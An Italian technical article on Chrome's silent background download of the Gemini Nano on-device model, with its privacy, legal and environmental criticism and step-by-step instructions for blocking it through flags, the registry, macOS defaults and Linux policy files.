Il meccanismo di distribuzione si appoggia a un componente interno noto come "Optimization Guide On-Device Model", originariamente concepito per migliorare le prestazioni di caricamento delle pagine tramite euristiche di apprendimento automatico. Tuttavia, con la versione 147 di Chrome, questa infrastruttura è stata riconvertita per fungere da vettore di distribuzione per l'intelligenza artificiale generativa sul dispositivo. Sebbene lo spostamento dell'inferenza dal cloud al dispositivo locale prometta vantaggi in termini di latenza e, teoricamente, di privacy dei dati, le modalità di implementazione — caratterizzate da un'installazione invisibile e da una resilienza aggressiva ai tentativi di rimozione manuale — hanno innescato un acceso dibattito tra i difensori della privacy e gli architetti del software.

Architettura Tecnica del Modello Gemini Nano in Ambiente Chrome

Per comprendere la portata di questo fenomeno, è necessario analizzare l'architettura sottostante che permette a un browser di eseguire modelli di linguaggio complessi. Gemini Nano non è un singolo file statico, ma un sistema dinamico integrato nel framework di esecuzione del browser che interagisce con le API Web AI di recente introduzione.

Il Ruolo della Optimization Guide

La "Optimization Guide" funge da orchestratore centrale per tutte le funzionalità di machine learning all'interno di Chrome. Storicamente, questo componente gestiva modelli di piccole dimensioni per la previsione del caricamento delle risorse o la classificazione delle immagini delle pagine. Con l'avvento di Gemini Nano, la guida è stata potenziata per gestire l'intero ciclo di vita di un LLM: dal download dei pesi (weights) alla verifica dell'integrità, fino alla gestione della memoria durante l'inferenza.

Componente del Sistema	Funzione Principale	Impatto sulle Risorse
weights.bin	Contiene i parametri binari del modello Gemini Nano.	~4 GB di spazio su disco.
manifest.json	Definisce la versione del modello e i requisiti di sistema.	Trascurabile.
on_device_model_execution_config.pb	Configura i parametri di esecuzione per la GPU o CPU.	Trascurabile.
adapter_cache.bin	Gestisce le personalizzazioni LoRA (Low-Rank Adaptation).	Variabile (fino a centinaia di MB).

Requisiti Hardware e Logica di Rilevamento

Google Chrome non distribuisce indiscriminatamente il modello a tutti gli utenti, ma effettua una scansione preliminare dell'hardware per determinare la compatibilità. Questa scansione è critica poiché l'esecuzione di un LLM può degradare sensibilmente le prestazioni di sistemi non adeguatamente equipaggiati.

I criteri di idoneità per l'installazione automatica includono:

• Memoria RAM: È richiesto un minimo di 16 GB per l'inferenza basata su CPU.

• Memoria Video (VRAM): Per l'accelerazione via GPU, il sistema deve disporre di oltre 4 GB di VRAM dedicata.

• Capacità di Archiviazione: Il sistema verifica la presenza di almeno 22 GB di spazio libero sul volume del profilo prima di avviare il download. Se, dopo l'installazione, lo spazio scende sotto i 10 GB, il browser può attivare una procedura di eliminazione automatica (purge) per preservare la stabilità del sistema operativo.

• Connettività: Il download viene attivato preferenzialmente su connessioni non a consumo (unmetered), sebbene segnalazioni indichino casi di attivazione anche su reti mobili in assenza di configurazioni restrittive.

Meccanismi di Distribuzione Silenziosa e Ciclo di Vita del File weights.bin

L'installazione del modello avviene tramite il "Chrome Component Updater", un servizio in background che opera indipendentemente dal ciclo di aggiornamento principale del browser. Questo servizio è progettato per garantire che i moduli critici, come le definizioni di Safe Browsing o i moduli DRM Widevine, siano sempre aggiornati senza richiedere l'intervento dell'utente.

Trigger di Download e Resilienza del Processo

L'attivazione del download di 4 GB è spesso innescata dalla prima interazione dell'utente con una delle nuove funzionalità IA, come "Help me write", o dal primo tentativo di un'applicazione web di chiamare funzioni come Summarizer.create() o LanguageModel.create(). Tuttavia, in versioni recenti, il download sembra verificarsi proattivamente anche solo per supportare funzionalità di sicurezza come il rilevamento di truffe e phishing in tempo reale.

La resilienza del processo è uno degli aspetti più controversi. Se un utente identifica il file weights.bin e lo elimina manualmente per liberare spazio, il Component Updater rileverà l'assenza del modulo al riavvio successivo e inizierà immediatamente un nuovo download in background. Questo ciclo di eliminazione e riscaricamento automatico è stato paragonato a comportamenti tipici dei software persistenti non autorizzati. È stato calcolato che il tempo necessario per completare l'intera operazione — dalla creazione della directory al posizionamento finale del binario — è di circa 14 minuti e 28 secondi su connessioni standard.

Struttura delle Directory per Piattaforma

Il file weights.bin risiede in percorsi specifici che variano a seconda del sistema operativo e del metodo di installazione del browser. Individuare queste cartelle è il primo passo per qualsiasi tentativo di analisi o rimozione manuale.

Sistema Operativo	Percorso Tipico della Cartella OptGuideOnDeviceModel
Windows 10/11	%LOCALAPPDATA%\Google\Chrome\User Data\OptGuideOnDeviceModel
macOS	~/Library/Application Support/Google/Chrome/OptGuideOnDeviceModel
Linux (deb/rpm)	~/.config/google-chrome/Default/OptGuideOnDeviceModel
Linux (Snap)	~/snap/chromium/common/chromium/Default/OptGuideOnDeviceModel
Linux (Flatpak)	~/.var/app/com.google.Chrome/config/google-chrome/Default/OptGuideOnDeviceModel

All'interno di queste cartelle, il sistema crea sottodirectory basate sulla versione del modello, come 2024.9.25.2033 o simili, rendendo difficile l'automazione della rimozione tramite script statici.

Analisi delle Implicazioni Legali, Etiche e Ambientali

La decisione unilaterale di distribuire un binario da 4 GB a miliardi di utenti solleva criticità che vanno ben oltre la mera occupazione di spazio su disco, toccando ambiti legali e di sostenibilità globale.

Violazione del Consenso e Direttiva ePrivacy

Dal punto di vista legale, l'installazione silente è oggetto di scrutinio in relazione alla Direttiva ePrivacy dell'Unione Europea. Tale normativa stabilisce che l'archiviazione di informazioni (o l'accesso a informazioni già archiviate) nel dispositivo terminale di un utente è consentita solo se l'utente ha espresso il proprio consenso dopo essere stato informato in modo chiaro. Sebbene esistano eccezioni per le funzionalità "strettamente necessarie" alla fornitura di un servizio richiesto, è difficile argomentare che un modello IA da 4 GB sia essenziale per la navigazione web di base. Esperti come Alexander Hanff hanno evidenziato come questo approccio tratti la macchina dell'utente come una "superficie di distribuzione" a disposizione del fornitore, ignorando l'autorità legale del proprietario del dispositivo.

Costo Ambientale e Impronta di Carbonio

Un aspetto spesso trascurato è il costo energetico della distribuzione di dati su questa scala. Spostare exabyte di dati (4 GB moltiplicati per centinaia di milioni di dispositivi idonei) richiede un dispendio energetico massiccio a livello di data center e infrastruttura di rete. Le stime indicano che una singola distribuzione di questo tipo potrebbe generare tra le 6.000 e le 60.000 tonnellate di emissioni di $CO_2$ equivalente.

La formula teorica per il calcolo dell'impatto ambientale di una tale operazione può essere espressa come:

$$EM_{total} = (N_{inst} \times S_{file}) \times E_{net} \times C_{mix}$$

Dove:

• $EM_{total}$ è l'emissione totale di gas serra.

• $N_{inst}$ è il numero di istanze di Chrome che ricevono il push.

• $S_{file}$ è la dimensione del file (4 GB).

• $E_{net}$ è l'intensità energetica media per GB trasferito (includendo router, server e cavi sottomarini).

• $C_{mix}$ è il coefficiente di emissione medio del mix energetico globale.

L'ironia sottolineata da molti critici è che gran parte di questo sforzo ambientale è finalizzato a funzionalità che l'utente medio potrebbe non attivare mai o che risiedono in menu profondamente sepolti nelle impostazioni.

Soluzioni e Strategie di Mitigazione per l'Utente

Dato che la semplice cancellazione del file non è una soluzione permanente, gli utenti che desiderano reclamare lo spazio su disco e impedire futuri download devono adottare misure più sofisticate.

Metodo 1: Gestione Tramite la Pagina Interna di Chrome

Google ha integrato una pagina di debug che permette di visualizzare lo stato del modello e, in alcuni casi, di forzarne la disinstallazione.

1. Digitare chrome://on-device-internals nella barra degli indirizzi.

2. Verificare la sezione Foundational model state. Se il valore è "Ready", il modello è presente sul disco.

3. Utilizzare il pulsante Uninstall (se disponibile) per rimuovere il binario.

È importante notare che, senza ulteriori blocchi, il sistema potrebbe comunque tentare il ripristino in futuro se le funzionalità IA rimangono attive.

Metodo 2: Disattivazione delle Funzionalità IA tramite "Flags"

Un metodo accessibile agli utenti domestici consiste nel disabilitare i flag sperimentali che attivano l'infrastruttura di ottimizzazione sul dispositivo.

1. Accedere a chrome://flags.

2. Cercare Enables optimization guide on device e impostarlo su Disabled.

3. Cercare Prompt API for Gemini Nano e impostarlo su Disabled.

4. Riavviare il browser cliccando su Relaunch.

Sebbene efficace, questo metodo ha il limite di poter essere annullato da Google con futuri aggiornamenti che potrebbero rimuovere o rinominare questi flag.

Metodo 3: Implementazione di Policy Enterprise (Soluzione Definitiva)

Per una protezione permanente, è necessario utilizzare la policy ufficiale GenAILocalFoundationalModelSettings. Questo comando istruisce il browser a ignorare completamente il download del modello locale, prevalendo sulla logica interna del Component Updater.

Configurazione su Windows (Registro di Sistema)

La modifica del registro di sistema è il metodo più robusto per gli utenti Windows che non dispongono di strumenti di gestione centralizzata.

1. Premere Win + R, digitare regedit e premere Invio.

2. Navigare verso HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome.

3. Se le chiavi Google o Chrome non esistono, crearle cliccando con il tasto destro sulla cartella precedente.

4. Creare un nuovo Valore DWORD (32-bit) chiamato GenAILocalFoundationalModelSettings.

5. Impostare il valore su 1 per disabilitare permanentemente il download.

6. Riavviare il computer e procedere alla cancellazione manuale della cartella OptGuideOnDeviceModel per liberare i 4 GB.

Configurazione su macOS

Su sistemi Apple, la policy può essere applicata tramite il terminale per impostare una preferenza di sistema che Chrome è obbligato a rispettare.

1. Aprire il Terminale.

2. Eseguire il comando: defaults write com.google.Chrome GenAILocalFoundationalModelSettings -int 1.

3. Riavviare Chrome e verificare l'applicazione della policy visitando chrome://policy.

Configurazione su Linux

Per gli utenti Linux, la gestione avviene tramite file JSON posizionati nelle directory delle policy di sistema.

1. Creare la directory delle policy: sudo mkdir -p /etc/opt/chrome/policies/managed.

2. Creare un file chiamato managed_policies.json con il seguente contenuto:

   {

     "GenAILocalFoundationalModelSettings": 1
   }

3. Riavviare il browser. Se si utilizza Chromium invece di Google Chrome, il percorso sarà /etc/chromium/policies/managed.

Impatto sull'Esperienza Utente e Diagnostica Avanzata

La disattivazione di Gemini Nano non impedisce la navigazione web standard, ma renderà indisponibili le funzionalità IA che operano localmente. Funzionalità come la "AI Mode" nella barra degli indirizzi potrebbero continuare a funzionare se configurate per utilizzare i server di Google (cloud inference), ma gli strumenti di assistenza alla scrittura o la ricerca avanzata nella cronologia potrebbero cessare di operare.

Diagnostica tramite Event Logs

Per gli amministratori di sistema o gli utenti avanzati, Chrome offre log dettagliati sull'attività dei modelli. Attraverso chrome://on-device-internals, è possibile accedere alla scheda Event Logs. Qui vengono registrati eventi critici come:

• Model downloading: Indica l'inizio del trasferimento del binario da 4 GB.

• Model loading error: Spesso legato a VRAM insufficiente o file corrotti.

• Model purged: Conferma che il browser ha rimosso il modello per mancanza di spazio su disco o per l'applicazione di una policy.

Questi log sono essenziali per confermare se le contromisure applicate (come le policy di registro) stiano effettivamente bloccando i tentativi di download del browser.

Il Fenomeno dei Pesi LoRA (Low-Rank Adaptation)

Oltre al modello base, Chrome gestisce pesi specializzati chiamati LoRA per compiti specifici come la correzione grammaticale avanzata (Proofreader API). Questi file sono significativamente più piccoli di weights.bin ma vengono aggiornati quotidianamente. È stato osservato che se il modello base viene rimosso correttamente tramite le policy sopra descritte, anche il download di questi pesi secondari viene interrotto, riducendo ulteriormente il traffico di rete in background.

Prospettive Future: L'IA come Componente del Sistema Operativo-Browser

L'episodio di Gemini Nano in Chrome è emblematico di una tendenza irreversibile: il "Edge AI". Le aziende tecnologiche stanno spostando il carico computazionale dai propri data center all'hardware dell'utente finale per due ragioni principali: la riduzione dei costi operativi immensi legati all'inferenza cloud e il miglioramento della privacy percepita, mantenendo i dati sensibili sul dispositivo.

Tuttavia, questo spostamento avviene a scapito dell'utente, che si trova a dover finanziare l'esecuzione del software con la propria energia elettrica, il proprio spazio su disco e la longevità dei propri SSD. In futuro, è probabile che vedremo requisiti di sistema per i browser sempre più simili a quelli dei videogiochi moderni, con una "tassa sulle risorse" che penalizzerà gli utenti con hardware datato.

La sfida per i legislatori e gli sviluppatori sarà quella di stabilire standard di trasparenza. Un semplice prompt di installazione — "Chrome vorrebbe scaricare un modello IA da 4 GB per migliorare le tue ricerche. Consenti o salta?" — avrebbe evitato gran parte delle critiche attuali. Finché tale trasparenza non diventerà lo standard, la gestione manuale tramite policy e registri rimarrà l'unica difesa per l'utente consapevole.

Sintesi delle Raccomandazioni Finali

In base all'analisi tecnica condotta, si consigliano le seguenti azioni per risolvere definitivamente la questione dell'occupazione di spazio da parte di Gemini Nano:

1. Analisi Iniziale: Utilizzare chrome://on-device-internals per confermare se il file da 4 GB è già presente sul sistema.

2. Blocco Preventivo: Applicare la policy GenAILocalFoundationalModelSettings tramite registro di sistema (Windows) o configurazioni policy (Linux/macOS) prima di procedere alla cancellazione.

3. Pulizia: Eliminare manualmente la cartella OptGuideOnDeviceModel dai percorsi del profilo utente specificati per recuperare lo spazio.

4. Monitoraggio: Verificare periodicamente lo stato delle policy tramite chrome://policy per assicurarsi che futuri aggiornamenti del browser non abbiano introdotto nuovi vettori di download silente.

L'adozione di queste misure garantisce il ripristino del controllo sulle risorse del dispositivo, mitigando al contempo i rischi legati alla privacy e l'impatto ambientale associato a questa distribuzione non richiesta.

Su mio device Windows 11 Home con 1TB di disco